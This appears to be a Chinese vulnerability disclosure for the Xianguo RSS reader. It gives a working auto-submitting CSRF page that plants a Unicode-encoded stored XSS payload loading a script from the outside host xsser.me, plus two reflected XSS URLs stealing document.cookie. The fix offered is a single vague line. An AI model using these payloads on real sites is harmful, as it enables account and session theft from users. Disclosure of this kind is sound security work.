问题出在订阅管理上,很明显的用UNICODE后的代码新建一个目录就OK了~~
可惜位置就是不太明显,就看怎么利用了。。
于是就想到了组合CSRF进行植入XSS代码。
于是乎,见 漏洞 证明。
--------------------
大概想到的利用方法:
用户访问挂马页
|
CSRF新建一个XSS目录
|
JS重定向到http://xianguo测试数据/my/feeds 触发
(貌似我没找到删除这个目录的地方,你怎么看)
xianguo. html
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://xianguo测试数据/rssreader?method=Actor.addFolder" method="post">
<input type="text" name="params" value="{"folderName":"\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0058\u0058\u0046\u0054\u0072\u004e\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E"}" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
两个反射,很疑惑为什么你们没有扫出来?
http://xianguo测试数据/search?searchType=all&keyword=88952634 keyword=88952634 "><script>alert(document.cookie);</script>
http://xianguo测试数据/passport/widget-login?rurl=%2Fservice%2Fsubmitfav%2F%3Flink%3Dhttp%253A%252F%252Fblog.xianguo测试数据%252F2008%252F02%252F25%252F0220-talk-about-rss-115.html%26title%3D%25E9%25B2%259C%25E6%259E%259C%25E6%2597%25A5%25E5%25BF%2597%2520%25C2%25BB%2520Blog%2520%25E5%25AD%2598%25E6%25A1%25A3%2520%25C2%25BB%2520%25E9%25B2%259C%25E6%259E%259C%25E5%2588%259B%25E5%25A7%258B%25E4%25BA%25BA%25E8%25B0%2588RSS%25E7%259A%2584%25E5%258F%2591%25E5%25B1%2595%2520link%3Dhttp%253A%252F%252Fblog.xianguo测试数据%252F2008%252F02%252F25%252F0220-talk-about-rss-115.html "><script>alert(document.cookie);</script>
修复方案:
过滤等
查看更多关于鲜果网通过CSRF种植XSS 外带几个反射性(含修复)的详细内容...